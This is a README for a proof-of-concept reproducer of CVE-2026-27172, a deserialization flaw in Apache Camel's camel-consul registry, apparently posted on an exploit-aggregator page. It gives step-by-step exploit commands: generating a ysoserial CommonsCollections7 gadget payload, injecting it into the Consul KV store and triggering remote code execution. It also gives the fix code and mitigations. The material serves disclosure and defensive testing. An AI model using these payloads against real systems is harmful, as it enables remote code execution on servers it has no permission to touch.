Share
## https://sploitus.com/exploit?id=9535E82E-AEDF-5DBC-82CC-0CA45D25444D
# camel-consul ConsulRegistry Deserialization Vulnerability Reproducer (CVE-2026-27172)

This project demonstrates a **Java deserialization vulnerability** in Apache Camel's
`camel-consul` component (`ConsulRegistry`), tracked as **CVE-2026-27172**. It is the same
class of issue as **CVE-2024-22369**, **CVE-2024-23114** and **CVE-2026-25747**, and was
overlooked during the original remediation of those CVEs.

Advisory: https://camel.apache.org/security/CVE-2026-27172.html

## Vulnerability Summary

| Property | Value |
|----------|-------|
| **Component** | `camel-consul` |
| **Affected Class** | `org.apache.camel.component.consul.ConsulRegistry` (`ConsulRegistryUtils.deserialize`) |
| **Vulnerable Methods** | `lookupByName()`, `lookupByNameAndType()`, `findByTypeWithName()`, `findByType()` |
| **CWE** | CWE-502: Deserialization of Untrusted Data |
| **Impact** | Remote Code Execution (RCE) |
| **Affected Versions** | From 3.0.0 before 4.14.6, and from 4.15.0 before 4.18.1 |
| **Fixed Versions** | 4.14.6, 4.18.1, 4.19.0 |
| **JIRA** | CAMEL-23029 |

## Technical Details

`ConsulRegistry` uses the Consul key/value store as a Camel registry. When a bean is looked
up by name, the stored value is Base64-decoded and deserialized with a raw
`ObjectInputStream` and, **in affected versions, no `ObjectInputFilter`**:

```java
// ConsulRegistry.lookupByName(...)
public Object lookupByName(String key) {
    kvClient = consul.keyValueClient();
    return kvClient.getValueAsString(key).map(result -> {
        byte[] postDecodedValue = ConsulRegistryUtils.decodeBase64(result);
        return ConsulRegistryUtils.deserialize(postDecodedValue);   // no filter (affected)
    }).orElse(null);
}

// ConsulRegistryUtils.deserialize(...) - affected version
static Object deserialize(byte[] bytes) {
    try (ObjectInputStream in = new ObjectInputStream(new ByteArrayInputStream(bytes))) {
        return in.readObject();   // NO FILTERING!
    }
}
```

Any object stored in the Consul KV store under a key that Camel later looks up is
deserialized. An attacker who can write to that KV path can plant a gadget-chain payload
that executes when the registry lookup happens.

## Prerequisites

- Java 17+
- Maven 3.8+
- A running Consul agent (KV store) โ€” e.g. via Docker
- ysoserial (for payload generation)

## Reproduction Steps

### Step 1: Start Consul

```bash
docker run -d --name consul -p 8500:8500 hashicorp/consul:1.17 agent -dev -client 0.0.0.0
```

### Step 2: Build and Start the Application

```bash
mvn clean package -DskipTests
mvn spring-boot:run
```

### Step 3: Initialize the Registry Key

```bash
curl http://localhost:8080/exploit/init
```

### Step 4: Generate a Malicious Payload

```bash
wget https://github.com/frohoff/ysoserial/releases/download/v0.0.6/ysoserial-all.jar

# Linux (benign proof: create a file). Use "open -a Calculator" on macOS, "calc.exe" on Windows.
java -jar ysoserial-all.jar CommonsCollections7 "touch /tmp/pwned" | base64 -w0 > payload.b64
```

`ConsulRegistry` stores Base64-encoded serialized objects, so the payload is delivered as
Base64.

### Step 5: Inject the Payload into Consul KV

```bash
curl -X POST http://localhost:8080/exploit/inject \
  -H "Content-Type: text/plain" \
  --data-binary @payload.b64
```

### Step 6: Trigger Deserialization (RCE!)

```bash
curl http://localhost:8080/exploit/trigger
```

`lookupByName()` reads the KV value, Base64-decodes it, and deserializes it โ€” executing the
gadget chain.

### Step 7: Verify Exploitation

```bash
ls -la /tmp/pwned
```

If the file `/tmp/pwned` exists, the exploit was successful.

## Attack Vectors

The vulnerability triggers whenever the registry resolves a bean:

1. **Bean references** โ€” `.to("bean:...")`, `bean(...)`, `.process("...")` by name all call `lookupByName()`.
2. **Startup resolution** โ€” beans resolved while routes are being built.
3. **Type lookups** โ€” `findByType()` / `lookupByNameAndType()` iterate KV entries and deserialize them.

## Exploit Conditions

1. **Write access to the Consul KV store** backing the registry:
   - A shared or misconfigured Consul cluster
   - A compromised/over-scoped Consul ACL token
   - Another vulnerability providing a KV write primitive
2. **A gadget library on the classpath**:
   - `commons-collections:3.2.1` (CommonsCollections1-7 gadgets)
   - Many others (see ysoserial)

## Comparison with the sibling CVEs

| Aspect | Cassandra (CVE-2024-23114) | LevelDB (CVE-2026-25747) | Consul (CVE-2026-27172) |
|--------|----------------------------|--------------------------|-------------------------|
| **Backing store** | Cassandra table | LevelDB file | Consul KV store |
| **ObjectInputFilter (before fix)** | none | none | **none** |
| **Fix** | `ObjectInputFilter` allow-list | `ObjectInputFilter` allow-list | `ObjectInputFilter` allow-list |
| **JIRA** | CAMEL-20306 | CAMEL-22821 | CAMEL-23029 |

## Recommended Fix

The fix (CAMEL-23029) adds a configurable `ObjectInputFilter` (default
`java.**;org.apache.camel.**;!*`) to `ConsulRegistryUtils.deserialize`, and exposes a
`deserializationFilter` option so trusted classes can be allow-listed:

```java
static Object deserialize(byte[] bytes, String deserializationFilter) {
    try (ObjectInputStream in = new ObjectInputStream(new ByteArrayInputStream(bytes))) {
        if (deserializationFilter != null) {
            in.setObjectInputFilter(ObjectInputFilter.Config.createFilter(deserializationFilter));
        }
        return in.readObject();
    }
}
```

## Mitigation

Until upgrading to a fixed version:

1. **Restrict Consul KV write access** to the Camel application's own identity (least-privilege ACL tokens).
2. **Remove gadget libraries**: upgrade or remove vulnerable libraries such as commons-collections 3.x.
3. **Network segmentation**: isolate the Consul cluster on a trusted network.

## Files

```
CVE-2026-27172/
โ”œโ”€โ”€ pom.xml                          # Maven configuration (affected camel-consul version)
โ”œโ”€โ”€ README.md                        # This file
โ””โ”€โ”€ src/main/
    โ”œโ”€โ”€ java/com/example/
    โ”‚   โ”œโ”€โ”€ Application.java          # Spring Boot entry point
    โ”‚   โ”œโ”€โ”€ ConsulRegistryRoute.java  # Camel route (disabled; shows real usage)
    โ”‚   โ””โ”€โ”€ ExploitController.java    # REST endpoints for the PoC
    โ””โ”€โ”€ resources/
        โ””โ”€โ”€ application.properties
```

## Disclaimer

This reproducer is provided for **security research and authorized testing only**, for a
**publicly disclosed and fixed** vulnerability. Do not use it against systems without
explicit permission.